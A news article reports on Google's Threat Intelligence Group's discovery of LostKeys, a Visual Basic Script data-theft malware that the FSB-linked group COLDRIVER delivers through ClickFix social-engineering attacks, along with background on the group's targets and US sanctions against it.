Google Uncovers 'LostKeys': New Russian Malware in Action
The world of cyber espionage has just gotten a lot more interesting – and sinister. A new piece of malware, dubbed "LostKeys," has been discovered by Google's Threat Intelligence Group, and it's being used by a Russian state-backed hacking group known as COLDRIVER to spy on Western entities.
COLDRIVER is linked to Russia's Federal Security Service (FSB), which is the country's counterintelligence and internal security agency. This connection has been previously established by the UK and its "Five Eyes" intelligence allies, who have also warned of a potential threat from COLDRIVER.
Google discloses LostKeys, a malware linked to Russia Google’s Threat Intelligence Group (GTIG) first spotted LostKeys in January. It seems COLDRIVER has been deploying it in very targeted “ClickFix” attacks. Think of these as digital con jobs where they trick people into running dodgy PowerShell scripts.
Basically, ClickFix attacks are based on classic social engineering. Once those scripts are running, they pave the way for even more PowerShell nastiness to be downloaded and executed. Their main goal is the installation of LostKeys, which Google has identified as a Visual Basic Script (VBS) data theft malware.
According to GTIG’s report, LostKeys is like a “digital vacuum cleaner” that extracts specific files and directories. It also sends system info and runs processes back to the attackers.
COLDRIVER's usual MO involves stealing login details to pilfer emails and contacts. However, they’ve also been known to deploy another malware called SPICA for grabbing documents and files. LostKeys seems to be serving a similar purpose, but it’s only brought out for those “highly selective cases.” This suggests that it’s a more specialized tool in COLDRIVER's espionage toolkit.
Interestingly, COLDRIVER isn’t the only state-sponsored group dabbling in these ClickFix attacks. The cyber underworld is apparently a fan of this tactic, with groups linked to North Korea (Kimsuky), Iran (MuddyWater), and even other Russian actors (APT28 and UNK_RemoteRogue) all using similar methods in their recent spying campaigns.
COLDRIVER is also known by a few other aliases, like Star Blizzard and Callisto Group. It has been honing their social engineering and open-source intelligence skills to trick targets since at least 2017. Their targets have ranged from defense and government organizations to NGOs and politicians.
The group’s attacks have been increasing, especially after Russia's invasion of Ukraine, even expanding to defense-industrial sites and US Department of Energy facilities.
US authorities are taking a very serious stance against COLDRIVER. The US State Department has slapped sanctions on a couple of COLDRIVER operatives (one reportedly an FSB officer). Currently, they are offering a hefty $10 million reward for any tips that could help track down other members. This reflects the level of seriousness with which the US is taking the group.